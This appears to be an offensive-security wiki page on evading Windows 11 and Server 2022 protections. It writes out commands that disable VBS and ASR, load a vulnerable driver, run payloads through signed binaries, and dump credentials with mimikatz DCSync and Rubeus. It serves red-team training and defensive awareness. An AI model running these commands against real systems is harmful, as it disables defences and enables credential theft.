Win11/Server2022 Evasion

Modern Windows security features and bypass techniques for Windows 11 and Server 2022+.

Skill Level: Advanced Prerequisites: Windows internals, memory management, assembly basics

Security Features Overview

Feature

Description

Bypass Difficulty

VBS

Virtualization-Based Security

Hard

HVCI

Hypervisor Code Integrity

Hard

CET

Control-flow Enforcement

Medium-Hard

CFG

Control Flow Guard

Medium

ASR

Attack Surface Reduction

Medium

Credential Guard

Isolated LSASS

Hard

WDAC

Windows Defender App Control

Medium

Smart App Control

AI-based blocking

Medium

Virtualization-Based Security (VBS)

Detection

# Check if VBS is enabled
Get-ComputerInfo | Select-Object -Property DeviceGuard*

# Check via WMI
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard

# Registry check
reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v EnableVirtualizationBasedSecurity

# msinfo32 output
systeminfo | findstr /i "virtualization"

VBS Components

VBS creates isolated memory regions protected by hypervisor:
- Credential Guard: Protects LSASS secrets
- HVCI: Validates kernel code integrity
- Windows Defender Application Guard: Browser isolation

When VBS is enabled:
- Direct kernel memory access is restricted
- Credential dumping from LSASS is blocked
- Unsigned kernel drivers cannot load

Bypass Approaches

1. Boot Configuration Attack
   - Modify BCD to disable VBS (requires admin + reboot)
   - bcdedit /set hypervisorlaunchtype off

2. Firmware/UEFI Attack
   - Requires physical access or firmware vulnerability
   - Disable virtualization in BIOS

3. Target Data Before VBS Protection
   - Intercept credentials during authentication
   - Hook before data enters secure enclave

4. Exploit VBS Implementation Bugs
   - Research ongoing for hypervisor escapes

Hypervisor Code Integrity (HVCI)

Detection

# Check HVCI status
Get-ProcessMitigation -System | Select-Object -ExpandProperty ASLR

# Via Device Guard settings
(Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard).SecurityServicesRunning
# 1 = Credential Guard, 2 = HVCI

Impact on Attacks

HVCI blocks:
- Loading unsigned kernel drivers
- Kernel code modification
- Many rootkit techniques

Still possible:
- Signed vulnerable drivers (BYOVD)
- User-mode attacks
- Living-off-the-land techniques

BYOVD (Bring Your Own Vulnerable Driver)

# Use known vulnerable signed driver
# Example: Dell dbutil_2_3.sys (CVE-2021-21551)

# Load vulnerable driver
sc create evildriver binPath= "C:\path\to\vulnerable.sys" type= kernel
sc start evildriver

# Use driver's vulnerability to:
# - Read/write kernel memory
# - Disable security features
# - Load unsigned code

# Known vulnerable drivers:
# - dbutil_2_3.sys (Dell)
# - ASUS drivers (CVE-2019-15125)
# - Gigabyte drivers
# - Capcom.sys

# Tool: KDU (Kernel Driver Utility)
# https://github.com/hfiref0x/KDU

Control-flow Enforcement Technology (CET)

What CET Protects

CET has two components:
1. Shadow Stack - Protects return addresses
2. Indirect Branch Tracking (IBT) - Validates call targets

Shadow Stack:
- Hardware-backed return address protection
- Separate stack stores return addresses
- Mismatch = exception

Impact on ROP:
- Traditional ROP chains fail
- Return addresses must match shadow stack

Detection

# Check if process has CET enabled
Get-ProcessMitigation -Name notepad.exe | Select CET*

# Check CPU support
(Get-WmiObject Win32_Processor).Caption
# Look for CET-capable Intel 11th gen+ or AMD Zen 3+

Bypass Techniques

1. JOP (Jump-Oriented Programming)
   - Use JMP gadgets instead of RET
   - Doesn't touch shadow stack
   - More complex to build chains

2. COP (Call-Oriented Programming)
   - Use CALL/JMP sequences
   - Harder but possible

3. Target Non-CET Processes
   - Legacy applications
   - 32-bit processes (less coverage)

4. Disable CET for Process
   - If admin, can modify process mitigation policy
   - SetProcessMitigationPolicy()

5. Stack Pivoting Before CET Init
   - Attack during process startup
   - Before CET is fully enabled

Control Flow Guard (CFG)

How CFG Works

CFG validates indirect call targets:
1. Compiler creates bitmap of valid call targets
2. Runtime validates calls against bitmap
3. Invalid target = exception

Protected: Indirect calls (call [rax])
Not Protected: Direct calls, returns (use CET)

Bypass Techniques

// 1. Call existing valid functions with controlled arguments
// Find function in CFG bitmap that does what you need

// 2. Overwrite CFG bitmap
// Requires arbitrary write primitive
// Bitmap at ntdll!LdrSystemDllInitBlock+0x70

// 3. Use non-CFG modules
// Older DLLs may not have CFG
// JIT-compiled code regions

// 4. Return-oriented attacks (before CET)
// CFG doesn't protect returns

// 5. Data-only attacks
// Corrupt data, not control flow

# Check if module has CFG
dumpbin /headers module.dll | findstr "Guard"

Windows Defender Application Control (WDAC)

Detection

# Check WDAC policy
Get-CimInstance -ClassName MSFT_MpComputerStatus -Namespace root\Microsoft\Windows\Defender

# Check CI policies
Get-CIPolicy -FilePath C:\Windows\System32\CodeIntegrity\SIPolicy.p7b

Bypass Techniques

# 1. LOLBins - Living Off The Land Binaries
# Use Microsoft-signed binaries
# https://lolbas-project.github.io/

# MSBuild (if allowed)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.csproj

# InstallUtil
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.dll

# CMSTP
cmstp.exe /ni /s payload.inf

# 2. Signed vulnerable applications
# Use legitimate signed apps with vulnerabilities

# 3. Script interpreters (if allowed)
# PowerShell in Constrained Language Mode bypass
# Python, Perl if installed

# 4. DLL side-loading
# Hijack DLL loaded by allowed application

Attack Surface Reduction (ASR)

ASR Rules

# Check enabled ASR rules
Get-MpPreference | Select-Object AttackSurfaceReductionRules_Ids, AttackSurfaceReductionRules_Actions

# Common rules:
# - Block Office macro code
# - Block executable content from email
# - Block process creation from Office
# - Block credential stealing from LSASS

Bypass Approaches

1. Rule-specific bypasses
   - Each rule has edge cases
   - Test specific rule implementation

2. Parent process spoofing
   - Make malicious process appear as allowed parent
   
3. Use unprotected applications
   - Not all apps covered by rules

4. Disable ASR (requires admin)
   Set-MpPreference -AttackSurfaceReductionRules_Ids <GUID> -AttackSurfaceReductionRules_Actions Disabled

Credential Guard Bypass

When Enabled

Credential Guard protects:
- NTLM hashes
- Kerberos TGTs/session keys
- Derived domain credentials

NOT protected:
- Credentials before they enter LSASS
- Cached credentials (DPAPI protected)
- Credentials for local accounts

Attack Alternatives

# 1. Keylogging - capture before protection
# Hook credential providers

# 2. Token manipulation
# Tokens are still in normal memory
Invoke-TokenManipulation

# 3. Kerberos ticket attacks
# Request new tickets, don't steal existing
Rubeus.exe asktgt /user:admin /password:pass

# 4. DCSync (if DA)
# Still works - network-based
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt

# 5. Target unprotected credentials
# Service account passwords in registry
# Cached credentials on disk
# Browser passwords

Smart App Control

What It Does

Windows 11 22H2+ feature:
- AI/ML-based application reputation
- Blocks untrusted executables
- Three modes: On, Evaluation, Off

Bypass Approaches

1. Signed binaries (EV certificate)
2. LOLBins (Microsoft-signed)
3. In-memory execution (if possible)
4. Abuse trusted applications
5. Wait for evaluation mode to turn off

Process Injection (Modern)

Techniques That Still Work

// 1. Thread Hijacking with hardware breakpoints
// Set HWBP, wait for trigger, modify context

// 2. Module Stomping
// Overwrite legitimate DLL in memory
// Avoid creating new executable memory

// 3. Transacted Hollowing
// Use NTFS transactions for cleaner hollowing

// 4. Process Ghosting
// Create file, mark for deletion, map as image
// File disappears but process runs

Tools

# Process Ghosting
https://github.com/hasherezade/process_ghosting

# Module Stomping
https://github.com/countercept/ModuleStomping

# Various injection techniques
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

Detection Evasion Summary

Attack

Pre-Win11

Win11 with VBS

Mimikatz sekurlsa

✓

✗ (Cred Guard)

Kernel driver load

✓

✗ (HVCI)

ROP chains

✓

✗ (CET)

Unsigned code

✓

✗ (WDAC)

BYOVD

✓

Token manipulation

✓

LOLBins

✓

DCSync

✓

RT/EDR Evasion - General evasion techniques
Windows Post-Exploitation - Windows attacks
Active Directory - AD attacks

PreviousWindows NextAD

Last updated 8 days ago

Was this helpful?

hashtagSecurity Features Overview

hashtagVirtualization-Based Security (VBS)

hashtagDetection

hashtagVBS Components

hashtagBypass Approaches

hashtagHypervisor Code Integrity (HVCI)

hashtagDetection

hashtagImpact on Attacks

hashtagBYOVD (Bring Your Own Vulnerable Driver)

hashtagControl-flow Enforcement Technology (CET)

hashtagWhat CET Protects

hashtagDetection

hashtagBypass Techniques

hashtagControl Flow Guard (CFG)

hashtagHow CFG Works

hashtagBypass Techniques

hashtagWindows Defender Application Control (WDAC)

hashtagDetection

hashtagBypass Techniques

hashtagAttack Surface Reduction (ASR)

hashtagASR Rules

hashtagBypass Approaches

hashtagCredential Guard Bypass

hashtagWhen Enabled

hashtagAttack Alternatives

hashtagSmart App Control

hashtagWhat It Does

hashtagBypass Approaches

hashtagProcess Injection (Modern)

hashtagTechniques That Still Work

hashtagTools

hashtagDetection Evasion Summary

hashtagRelated Topics

Security Features Overview

Virtualization-Based Security (VBS)

Detection

VBS Components

Bypass Approaches

Hypervisor Code Integrity (HVCI)

Detection

Impact on Attacks

BYOVD (Bring Your Own Vulnerable Driver)

Control-flow Enforcement Technology (CET)

What CET Protects

Detection

Bypass Techniques

Control Flow Guard (CFG)

How CFG Works

Bypass Techniques

Windows Defender Application Control (WDAC)

Detection

Bypass Techniques

Attack Surface Reduction (ASR)

ASR Rules

Bypass Approaches

Credential Guard Bypass

When Enabled

Attack Alternatives

Smart App Control

What It Does

Bypass Approaches

Process Injection (Modern)

Techniques That Still Work

Tools

Detection Evasion Summary

Related Topics